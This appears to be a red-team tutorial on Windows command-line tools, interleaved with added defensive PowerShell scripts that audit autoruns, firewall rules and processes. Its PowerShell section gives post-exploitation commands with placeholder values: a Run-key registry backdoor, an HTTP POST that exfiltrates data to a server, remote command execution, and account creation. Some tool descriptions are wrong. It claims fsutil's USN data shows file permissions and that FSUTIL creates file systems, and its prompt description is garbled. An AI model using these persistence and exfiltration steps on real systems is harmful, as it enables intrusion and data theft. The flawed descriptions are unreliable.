As a Red Team member, you need to have a solid understanding of the command-line tools available to you on Windows systems. This article will explore the most potent command-line tools for advanced Red Team members: PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin.
PowerShell
PowerShell is a command-line shell and scripting language designed specifically for Windows. It is based on the .NET Framework and provides access to a wide range of Windows administration capabilities. PowerShell is often used to automate tasks but is also a powerful tool for manually performing tasks.
One of PowerShell’s main advantages is that it provides access to the Windows Management Instrumentation (WMI) framework. You can use PowerShell to perform various system administration tasks, such as managing processes, services, and users. Additionally, PowerShell provides access to the Registry and Active Directory, two critical Windows administration components.
PowerShell is often used for post-exploitation activities, as it can execute commands and scripts on a compromised system. To use PowerShell, open a command prompt and type “powershell”. This will start the PowerShell shell, which looks similar to a typical command prompt but with a different prompt (">" instead of “>_”).
One of the most useful PowerShell commands for Red Team members is Invoke-Command. This command allows you to execute a command or script on a remote system. For example, if you have compromised a system and want to execute a PowerShell script on it, you can use the following command:
Invoke-Command -ComputerName <hostname> -ScriptBlock { <PowerShell script> }
This will execute the PowerShell script on the remote system. To use this command you must have administrative credentials on the remote system, and PowerShell Remoting (WinRM) must be enabled on it.
Another useful PowerShell command is Get-WmiObject. This command allows you to retrieve information from the WMI framework. For example, you can use the following command to retrieve a list of running processes on a system:
Get-WmiObject -Class Win32_Process
This will return a list of all running processes on the local system. The “-ComputerName” parameter can retrieve the process list from a remote system. Note that Get-WmiObject is only available in Windows PowerShell (5.1 and earlier); in PowerShell 7 the Get-CimInstance cmdlet is the supported equivalent.
Using PowerShell for post-exploitation activities
One of your primary objectives as a Red Team member is to maintain access to a compromised system. PowerShell can perform post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
To create a backdoor on a compromised system using PowerShell, you can use the following command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "<backdoor_name>" -Value "<backdoor_path>" -PropertyType String
This command creates a new registry value under the “Run” key that points to the backdoor executable. This ensures that the backdoor is executed every time the system is booted.
To exfiltrate data from a compromised system, you can use the following command:
Invoke-RestMethod -Uri "<server_url>" -Method Post -Body "<exfiltrated_data>"
This command sends an HTTP POST request to a server specified by the “server_url” parameter. The “exfiltrated_data” parameter contains the data to be exfiltrated.
To execute a command on a remote system using PowerShell, you can use the following command:
Invoke-Command -ComputerName "<remote_system>" -ScriptBlock { <command> }
This command executes the specified command on the remote system.
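The Run-key persistence described above is also what a defender audits for. The following added example (not code from the original article) enumerates the Run and RunOnce keys under HKLM and HKCU and flags entries whose executable is missing or lives outside the Windows and Program Files trees; it assumes PowerShell 5.1 or later on Windows.

```powershell
# Added example (not from the original article): audit the autorun keys that
# the New-ItemProperty command above writes to, and flag entries whose
# executable is missing or lives outside the Windows and Program Files trees.
# Assumes PowerShell 5.1 or later on Windows; no elevation is needed to read.
$autorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Directories from which legitimate autoruns normally start.
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Get-ExecutablePath {
    # Extract the image path from a Run value such as
    #   "C:\Tools\agent.exe" --silent   or   C:\Tools\agent.exe --silent
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(\S+)')     { return $Matches[1] }
    return $Command
}

function Get-AutorunReport {
    foreach ($key in $autorunKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        # Skip the provider's PS* note properties; everything else is a value.
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }
            $exe = [Environment]::ExpandEnvironmentVariables((Get-ExecutablePath $prop.Value))
            $exists = [bool]($exe -and (Test-Path -LiteralPath $exe))
            $inTrusted = $false
            foreach ($root in $trustedRoots) {
                if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inTrusted = $true }
            }
            # Bare image names (no directory) fail both checks and are flagged for review.
            [pscustomobject]@{
                Key        = $key
                Name       = $prop.Name
                Command    = $prop.Value
                Executable = $exe
                Exists     = $exists
                Suspicious = (-not $inTrusted) -or (-not $exists)
            }
        }
    }
}

Get-AutorunReport | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```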
Using PowerShell for reconnaissance
PowerShell can be used for reconnaissance activities like network mapping and system enumeration. Here are some examples:
To map a network using PowerShell, you can use the following command:
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object IPAddress
This command retrieves the IP addresses of all network adapters currently enabled. You can use this information to map the network.
To enumerate the software installed on a system, you can use the following command:
Get-WmiObject -Class Win32_Product | Select-Object Name,Version
This command retrieves the names and versions of all software installed with Windows Installer. Note that querying Win32_Product is slow and triggers a Windows Installer consistency check (and possibly repairs) of every installed product, which is noisy on a live system.
Using PowerShell to manage Active Directory
PowerShell can be used to manage Active Directory, a critical Windows administration component. Here are some examples:
To create a new user account in Active Directory, you can use the following command:
New-ADUser -Name "<user_name>" -GivenName "<given_name>" -Surname "<surname>" -UserPrincipalName "<user_principal_name>" -AccountPassword (ConvertTo-SecureString "<password>" -AsPlainText -Force)
This command creates a new user account with the specified name, given name, surname, and user principal name. The account password is specified using the “password” parameter.
To modify the group membership of a user account in Active Directory, you can use the following command:
Remove-ADGroupMember -Identity "<group_name>" -Members "<user_name>"
This command removes the specified user account from the specified group.
Netsh
Netsh is a command-line tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
One of the most valuable commands in Netsh is netsh firewall. This command allows you to configure the Windows Firewall, a critical component of network security on Windows systems. For example, you can use the following command to add an inbound rule to the firewall that allows traffic on TCP port 80:
netsh firewall add portopening TCP 80 "HTTP"
This will create a new Windows Firewall rule allowing inbound traffic on TCP port 80. Note that the netsh firewall context has been deprecated since Windows Vista in favour of the netsh advfirewall context; current systems still accept the legacy syntax but print a deprecation warning.
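Rules such as the TCP/80 opening above are easy to add and easy to forget, so a reviewer wants to see what is currently open. The following added example (not from the original article) lists the enabled inbound allow rules with their ports, remote scope and program using the NetSecurity module cmdlets (Windows 8 / Server 2012 and later); it assumes PowerShell 5.1 or later.

```powershell
# Added example (not from the original article): enumerate enabled inbound
# "allow" firewall rules, like the one the netsh command above creates, with
# the ports, remote addresses and program each one opens. Uses the NetSecurity
# module (Windows 8 / Server 2012 and later); assumes PowerShell 5.1 or later.
function Get-InboundAllowRules {
    param(
        # Report only rules whose remote scope is unrestricted ("Any").
        [switch]$AnyRemoteOnly
    )
    $rules = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True
    foreach ($rule in $rules) {
        # The port, address and program filters are separate objects
        # associated with the rule; pipe the rule to fetch each one.
        $port   = $rule | Get-NetFirewallPortFilter
        $addr   = $rule | Get-NetFirewallAddressFilter
        $app    = $rule | Get-NetFirewallApplicationFilter
        $remote = ($addr.RemoteAddress -join ',')
        if ($AnyRemoteOnly -and $remote -ne 'Any') { continue }
        [pscustomobject]@{
            Name      = $rule.DisplayName
            Profile   = $rule.Profile
            Protocol  = $port.Protocol
            LocalPort = ($port.LocalPort -join ',')
            Remote    = $remote
            Program   = $app.Program
        }
    }
}

# Example usage: rules reachable from any remote address, ordered by port.
Get-InboundAllowRules -AnyRemoteOnly | Sort-Object LocalPort | Format-Table -AutoSize
```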
Another helpful command in Netsh is netsh interface. This command allows you to configure network adapters on a Windows system. For example, you can use the following command to configure the IP address and subnet mask of a network adapter:
netsh interface ip set address "Local Area Connection" static 192.168.1.10 255.255.255.0
WMIC
The Windows Management Instrumentation Command-line (WMIC) tool is a powerful command-line interface to the Windows Management Instrumentation (WMI) framework. WMIC can perform various system administration tasks, such as managing processes, services, and users. Note that WMIC is deprecated and is being removed from current Windows 11 releases; the PowerShell CIM cmdlets are the supported replacement.
To view a list of running processes, you can use the following command:
wmic process get Name,ProcessId,CommandLine
This command retrieves the names, process IDs, and command lines of all running processes on the system.
To create a new user account, you can use the following command:
wmic useraccount create name="<user_name>" password="<password>"
This command creates a new user account with the specified name and password.
Tasklist
The Tasklist command-line tool allows you to view a list of running processes on a Windows system. Tasklist is similar to the “ps” command in Unix-based operating systems.
Tasklist can be used to identify malicious processes that may be running on a compromised system.
To identify these processes, you can use the following command:
tasklist /v /fi "imagename eq <process_name>"
This command retrieves detailed information about the process using the specified name. By analyzing the output, you can identify whether the process is malicious.
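The Get-WmiObject Win32_Process listing earlier and the tasklist query above both give a flat process list; triage needs the parent process, the image path and whether the image is signed. The following added example (not from the original article) produces that enriched view with Get-CimInstance and Get-AuthenticodeSignature, and assumes PowerShell 5.1 or later on Windows.

```powershell
# Added example (not from the original article): the process listing the
# article gets from Get-WmiObject Win32_Process and tasklist, enriched with
# parent process, image path and Authenticode signature status so that an
# unfamiliar process can be triaged. Uses Get-CimInstance, the supported
# replacement for Get-WmiObject. Assumes PowerShell 5.1 or later on Windows.
function Get-ProcessTriage {
    param(
        # Optional image name filter such as 'powershell.exe' (wildcards allowed).
        [string]$ImageName = '*'
    )
    $all = Get-CimInstance -ClassName Win32_Process
    # Index by PID so each parent is resolved without a second WMI query.
    $byPid = @{}
    foreach ($p in $all) { $byPid[[int]$p.ProcessId] = $p }
    foreach ($p in $all) {
        if ($p.Name -notlike $ImageName) { continue }
        $parent = $byPid[[int]$p.ParentProcessId]
        $parentText = if ($parent) { "$($parent.Name) ($($parent.ProcessId))" } else { "<exited> ($($p.ParentProcessId))" }
        # The signature check only makes sense while the image is still on disk.
        $sig = 'n/a'
        if ($p.ExecutablePath -and (Test-Path -LiteralPath $p.ExecutablePath)) {
            $sig = (Get-AuthenticodeSignature -FilePath $p.ExecutablePath).Status.ToString()
        }
        # Triage heuristics: image not validly signed, no image path at all, or an
        # image running from outside the Windows and Program Files trees.
        $flag = ($sig -ne 'Valid') -or ($p.ExecutablePath -notmatch '^[A-Za-z]:\\(Windows|Program Files)')
        [pscustomobject]@{
            PID         = $p.ProcessId
            Name        = $p.Name
            Parent      = $parentText
            Path        = $p.ExecutablePath
            Signature   = $sig
            Flag        = $flag
            CommandLine = $p.CommandLine
        }
    }
}

# Example usage: only the processes worth a second look.
Get-ProcessTriage | Where-Object Flag | Format-Table PID, Name, Parent, Signature, Path -AutoSize
```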
FSUTIL
The FSUTIL command-line tool allows you to manage file systems and volumes on a Windows system. It can perform tasks such as creating and deleting file systems, compressing and decompressing files, and managing file permissions.
FSUTIL can be used to manage file permissions on a Windows system. To view the permissions of a file, you can use the following command:
fsutil usn readdata "<file_path>"
This command retrieves the specified file’s USN journal data, which includes information about the file’s permissions.
To modify the permissions of a file, you can use the following command:
icacls "<file_path>" /grant <user_name>:<permission>
This command grants the specified user the specified permission on the file. Note that icacls is a separate command-line tool rather than an FSUTIL subcommand.
VSSAdmin
The VSSAdmin command-line tool allows you to manage the Volume Shadow Copy Service (VSS) on a Windows system. VSS is a built-in Windows service enabling you to create backup copies of files and system states.
VSSAdmin can be used to create and manage VSS snapshots. To create a new snapshot, you can use the following command:
vssadmin create shadow /for="<volume>"
This command creates a new VSS snapshot of the specified volume. Note that the create shadow subcommand is only available on Windows Server editions; client editions of Windows can list but not create shadow copies with vssadmin.
To list all existing VSS snapshots, you can use the following command:
vssadmin list shadows
This command retrieves a list of all VSS snapshots created on the system.
Conclusion
As a Red Team member, you must have a solid understanding of the command-line tools available to you on Windows systems. PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin are some of the most powerful tools for advanced Red Team members.
PowerShell is the most versatile and widely used tool. It provides access to the Windows Management Instrumentation (WMI) framework, the Registry, and Active Directory. PowerShell is often used for post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
Netsh is a powerful tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
WMIC is a powerful tool for managing processes, services, and users on a Windows system. WMIC provides access to the Windows Management Instrumentation (WMI) framework, allowing you to perform various system administration tasks.
Tasklist is a tool for viewing a list of running processes on a Windows system. Tasklist is particularly useful for identifying malicious processes running on a compromised system.
FSUTIL is a tool for managing file systems and volumes on a Windows system. FSUTIL provides a wide range of functionality, from creating and deleting file systems to managing file permissions.
VSSAdmin is a tool for managing the Volume Shadow Copy Service (VSS) on a Windows system. It allows you to create and manage VSS snapshots, which are used to create backup copies of files and system states.
By understanding how to use these tools effectively, Red Team members can perform various system administration tasks, from managing users and network settings to identifying and removing malicious processes. These tools are essential for any Red Team member who wants to be successful in their work.